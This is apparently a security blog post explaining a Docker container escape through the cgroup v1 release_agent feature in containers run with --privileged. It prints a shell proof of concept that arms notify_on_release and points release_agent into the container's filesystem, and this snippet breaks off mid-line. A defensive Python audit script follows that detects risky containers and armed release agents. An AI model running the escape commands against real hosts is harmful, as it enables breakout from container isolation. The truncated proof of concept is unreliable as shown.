
Understanding Docker container escapes
Trail of Bits recently completed a security assessment of Kubernetes, focusing on its interaction with Docker. The recent tweet by Felix Wilhelm, showcasing a Proof of Concept (PoC) for a "container escape," piqued our interest. We had conducted similar research and were eager to understand how this PoC could affect Kubernetes.
Felix’s tweet illustrates an exploit that enables the launch of a process on the host system from within a Docker container that is executed with the --privileged flag.
How the PoC Works
The PoC achieves this by taking advantage of the Linux cgroup v1 "notification on release" feature. Below is a version of the PoC that executes the 'ps' command on the host:
# Spawn a new container to exploit via:
# docker run --rm -it --privileged ubuntu bash
d=`dirname $(ls -x /s*/fs/c*/*/r* | head -n1)`
mkdir -p $d/w; echo 1 > $d/w/notify_on_release
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
touch /o; echo $t/c > $d/release_agent; printf '#!/bin/sh
ps >'
Understanding the Security Implications of the --privileged Flag
The --privileged flag is the root of the problem. The PoC only works because the container was started with this flag: a privileged container is given access to every device and resource on the host and runs without the usual capability restrictions, which is what lets it write to the host's cgroup filesystem in the first place.
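Two checks a defender can run against this class of escape, written as an added example for this page (not Trail of Bits code): the first flags containers started with --privileged (or with CAP_SYS_ADMIN added, which is enough to reach the cgroup tree) from `docker inspect` output, and the second walks a cgroup v1 mount looking for the state the PoC leaves behind: a hierarchy with a non-empty release_agent and a child cgroup with notify_on_release set to 1. The JSON and the directory layout in demo() are constructed samples, and the overlay path in the planted release_agent is a placeholder.

```python
"""Audit helpers for the cgroup v1 release_agent escape (added example).

1. find_risky_containers: flag containers whose HostConfig grants what the
   PoC needs (--privileged, or CAP_SYS_ADMIN via --cap-add).
2. find_armed_release_agents: scan a cgroup v1 mount for a hierarchy with a
   release_agent set and a child cgroup with notify_on_release=1.
"""
import json
import os
import tempfile

# Constructed sample resembling `docker inspect` output for three containers.
SAMPLE_INSPECT = json.dumps([
    {"Id": "aaa111", "Name": "/web",
     "HostConfig": {"Privileged": False, "CapAdd": None}},
    {"Id": "bbb222", "Name": "/debug",
     "HostConfig": {"Privileged": True, "CapAdd": None}},
    {"Id": "ccc333", "Name": "/builder",
     "HostConfig": {"Privileged": False, "CapAdd": ["SYS_ADMIN"]}},
])

# CAP_SYS_ADMIN (or ALL) lets a process mount and write cgroupfs.
RISKY_CAPS = {"SYS_ADMIN", "ALL"}


def find_risky_containers(inspect_json):
    """Return (name, reason) pairs for containers that could reach the host
    cgroup tree. --privileged grants every capability and device; CAP_SYS_ADMIN
    alone is enough for the cgroup part, so CapAdd is checked as well."""
    findings = []
    for c in json.loads(inspect_json):
        hc = c.get("HostConfig", {})
        caps = {cap[4:] if cap.startswith("CAP_") else cap
                for cap in (hc.get("CapAdd") or [])}
        if hc.get("Privileged"):
            findings.append((c["Name"], "privileged"))
        elif caps & RISKY_CAPS:
            findings.append((c["Name"], "cap_add:" + ",".join(sorted(caps & RISKY_CAPS))))
    return findings


def _read(path):
    with open(path) as f:
        return f.read().strip()


def find_armed_release_agents(cgroup_root):
    """Walk a cgroup v1 mount (e.g. /sys/fs/cgroup) and return
    (hierarchy, release_agent, armed_cgroup_dir) for hierarchies whose
    release_agent is non-empty and which contain a cgroup with
    notify_on_release=1. A release_agent the host never configured,
    especially one pointing into a container's overlay upperdir, is the
    footprint the PoC leaves."""
    hits = []
    for hierarchy in sorted(os.listdir(cgroup_root)):
        hdir = os.path.join(cgroup_root, hierarchy)
        agent_path = os.path.join(hdir, "release_agent")
        if not os.path.isfile(agent_path):
            continue
        agent = _read(agent_path)
        if not agent:
            continue
        for dirpath, _dirs, files in os.walk(hdir):
            if "notify_on_release" in files and \
               _read(os.path.join(dirpath, "notify_on_release")) == "1":
                hits.append((hierarchy, agent, dirpath))
                break
    return hits


def demo():
    """Build a constructed cgroup v1 layout in a temp dir and run both checks."""
    planted = "/var/lib/docker/overlay2/UPPERDIR_PLACEHOLDER/diff/c"  # placeholder path
    with tempfile.TemporaryDirectory() as root:
        # 'memory' hierarchy: release_agent planted, child 'w' armed (PoC state).
        os.makedirs(os.path.join(root, "memory", "w"))
        with open(os.path.join(root, "memory", "release_agent"), "w") as f:
            f.write(planted + "\n")
        with open(os.path.join(root, "memory", "w", "notify_on_release"), "w") as f:
            f.write("1\n")
        # 'cpu' hierarchy: clean, empty release_agent and notifications off.
        os.makedirs(os.path.join(root, "cpu"))
        with open(os.path.join(root, "cpu", "release_agent"), "w") as f:
            f.write("\n")
        with open(os.path.join(root, "cpu", "notify_on_release"), "w") as f:
            f.write("0\n")
        agents = find_armed_release_agents(root)
    return find_risky_containers(SAMPLE_INSPECT), [(h, a) for h, a, _ in agents]


if __name__ == "__main__":
    containers, agents = demo()
    print("risky containers:", containers)
    print("armed release agents:", agents)
```

On a real host, feed `docker inspect $(docker ps -q)` to find_risky_containers and point find_armed_release_agents at the cgroup v1 mount (typically /sys/fs/cgroup); an empty release_agent on every hierarchy is the expected, clean result.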